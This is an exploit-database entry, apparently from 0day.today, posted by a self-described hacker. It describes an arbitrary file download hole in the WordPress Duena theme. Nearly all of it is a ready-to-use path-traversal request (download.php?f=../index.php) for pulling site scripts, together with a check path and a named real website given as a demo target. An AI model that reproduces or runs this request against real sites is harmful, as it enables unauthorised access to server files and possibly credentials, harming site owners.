id: 29598
date: 01/21/2018
title: Wordpress duena theme - Arbitrary file download Vulnerability
author: MrSqar
cves: 

-===================足====================足=================-
# Exploit title : Wordpress duena theme - Arbitrary file download
# author : MrSqar Yemeni hacker
# Team : IT-Geeks
# Tested on : BackBox linux
# check if site is vulnerabe : /wp-content/themes/duena/download.php
you can download any script from the site by this method 
site.com/wp-content/themes/duena/download.php?f=../index.php
# deom site :
https://www.puti.org/id/wp-content/themes/duena/download.php?f=../index.php
 -===================足====================足=================-

#  0day.today [2023-03-27]  #